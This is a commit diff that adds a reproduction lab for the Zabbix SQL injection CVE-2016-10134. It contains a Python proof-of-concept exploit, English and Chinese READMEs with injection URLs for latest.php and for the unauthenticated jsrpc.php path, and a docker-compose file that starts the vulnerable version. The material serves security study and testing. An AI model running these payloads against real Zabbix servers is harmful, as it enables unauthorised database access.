first commit

zabbix/CVE-2016-10134/CVE-2016-10134.py

@@ -0,0 +1,96 @@
+# -*- coding: utf-8 -*-
+# @Time    : 2021/12/23
+# @Author  : TesterCC
+
+import json
+
+from optparse import OptionParser
+
+import re
+import sys
+
+from requests import session
+
+# initialization
+ret = dict()
+ret['status'] = str()
+ret['info'] = list()
+
+ss = session()
+ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
+              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
+
+
+# CVE-2016-10134  # python3 CVE-2016-10134.py --target 127.0.0.1:8080
+
+def get_payload1(text) -> str:
+    payload = re.search(r"\[(.*\))\]", text)
+    return payload.group(1)
+
+
+def get_sql_injection_info(text) -> str:
+    sql_injection_info = re.search(r"<\/li><li>(.*)\'\]", text)
+    return sql_injection_info.group(1)
+
+
+def attack(target):
+    '''login zabbix'''
+    login_url = "http://{}/index.php".format(target)
+
+    ret0 = ss.get(login_url)
+
+    cookie_dict = {i.name: i.value for i in ret0.cookies}
+    # get sid
+    sid = cookie_dict.get('zbx_sessionid')[16:]
+
+    data = {"sid": sid,
+            "form_refresh": "1",
+            "name": "",
+            "password": "",
+            "enter": "Sign+in"}
+
+    retn = ss.post(url=login_url, headers=ss.headers, data=data)
+    if retn.status_code == 200:
+        # updatexml(0,concat(0xa,database()),0)
+        # updatexml(0,concat(0xa,version()),0)
+        payload1 = f"http://{target}/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)"
+
+        retn2 = ss.get(url=payload1, headers=ss.headers)
+
+        if retn2.status_code == 200:
+            resp = {
+                "payload": get_payload1(retn2.text),
+                "info": get_sql_injection_info(retn2.text)
+            }
+
+            ret['status'] = 'success'
+            ret['info'] = resp
+
+    return ret
+
+
+def main():
+    usage = "Usage: python3 CVE-2016-10134.py --target <target ip:port>"
+    parse = OptionParser(usage=usage)
+    parse.add_option("-t", '--target', type="string", dest="target", help="server ip:port, e.g. 127.0.0.1:8080")
+
+    options, args = parse.parse_args()
+
+    if not options.target:
+        ret['status'] = 'fail'
+        ret['info'] = "target empty"
+        print(usage)
+        sys.exit()
+    else:
+        target = options.target
+
+    try:
+        attack(target)
+    except Exception:
+        ret['status'] = 'fail'
+
+    print(json.dumps(ret))
+
+
+if __name__ == '__main__':
+    main()

zabbix/CVE-2016-10134/README.md

@@ -0,0 +1,47 @@
+# Zabbix latest.php SQL Injection (CVE-2016-10134)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Zabbix is a server monitoring software that consists of server, agent, and web modules. The web module is written in PHP and is used to display results from the database.
+
+In the Zabbix version before 2.2.14 and 3.0 before 3.0.4, there is a SQL injection vulnerability in the `latest.php` file. This vulnerability allows remote attackers to execute arbitrary SQL commands via the `toggle_ids` array parameter. This vulnerability can also be triggered through jsrpc.php without authentication.
+
+References:
+
+- https://support.zabbix.com/browse/ZBX-11023
+- https://www.exploit-db.com/exploits/40237
+- https://www.exploit-db.com/exploits/40353
+
+## Environment Setup
+
+Execute the following command to start Zabbix 3.0.3:
+
+```
+docker compose up -d
+```
+
+After executing the command, it will start the database (MySQL), Zabbix server, Zabbix agent, and Zabbix web interface. If your system has limited memory, some containers might fail to start. You can check container status using `docker compose ps` and restart containers using `docker compose start`.
+
+## Vulnerability Reproduction
+
+Visit `http://your-ip:8080` and log in with the guest account (username: `guest`, password: empty).
+
+After logging in, check the `zbx_sessionid` in your cookies and copy the last 16 characters:
+
+![](1.png)
+
+Use these 16 characters as the sid value and visit `http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`. You can see the successful SQL injection:
+
+![](2.png)
+
+This vulnerability can also be triggered through jsrpc.php without requiring login: `http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`:
+
+![](3.png)
+
+During debugging, I discovered that the `latest.php` SQL injection is possible without requiring a username and password. For implementation details, see the POC.
+
+```shell
+python3 CVE-2016-10134.py -t 127.0.0.1:8080
+
+python3 CVE-2016-10134.py --target 127.0.0.1:8080
+```

zabbix/CVE-2016-10134/README.zh-cn.md

@@ -0,0 +1,49 @@
+# Zabbix latest.php SQL注入漏洞（CVE-2016-10134）
+
+[English](README.md)
+
+Zabbix是一款服务器监控软件，其由server、agent、web等模块组成，其中web模块由PHP编写，用来显示数据库中的结果。
+
+在Zabbix版本2.2.14和3.0.4之前，`latest.php`文件存在SQL注入漏洞。该漏洞允许远程攻击者通过`toggle_ids`数组参数在latest.php中执行任意SQL命令。该漏洞也可以通过jsrpc.php利用，且无需任何用户身份。
+
+参考链接：
+
+- https://support.zabbix.com/browse/ZBX-11023
+- https://www.exploit-db.com/exploits/40237
+- https://www.exploit-db.com/exploits/40353
+
+## 环境搭建
+
+执行如下命令启动Zabbix 3.0.3:
+
+```
+docker compose up -d
+```
+
+执行命令后，将启动数据库（MySQL）、Zabbix server、Zabbix agent、Zabbix web。如果内存稍小，可能会存在某个容器挂掉的情况，我们可以通过`docker compose ps`查看容器状态，并通过`docker compose start`来重新启动容器。
+
+## 漏洞复现
+
+访问`http://your-ip:8080`，用账号`guest`（密码为空）登录游客账户。
+
+登录后，查看Cookie中的`zbx_sessionid`，复制后16位字符：
+
+![](1.png)
+
+将这16个字符作为sid的值，访问`http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`，可见成功注入：
+
+![](2.png)
+
+这个漏洞也可以通过jsrpc.php触发，且无需登录：`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`：
+
+![](3.png)
+
+## POC验证
+
+调试中，我发现不用用户名和密码也可以在latest.php中进行SQL注入，实现细节见POC。
+
+```shell
+python3 CVE-2016-10134.py -t 127.0.0.1:8080
+
+python3 CVE-2016-10134.py --target 127.0.0.1:8080
+```

zabbix/CVE-2016-10134/docker-compose.yml

@@ -0,0 +1,48 @@
+services:
+ server:
+   image: vulhub/zabbix:3.0.3-server
+   command: server
+   depends_on:
+    - mysql
+   environment: 
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+ agent:
+   image: vulhub/zabbix:3.0.3-server
+   command: agent
+   depends_on:
+    - mysql
+    - server
+   environment: 
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_HOST_ACT=server
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+ mysql:
+   image: mysql:5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=zabbix
+   volumes:
+    - ./database/:/docker-entrypoint-initdb.d/
+ web:
+   image: vulhub/zabbix:3.0.3-web
+   depends_on:
+    - server
+    - mysql
+   environment:
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_PORT=10051
+   ports:
+    - "8080:80"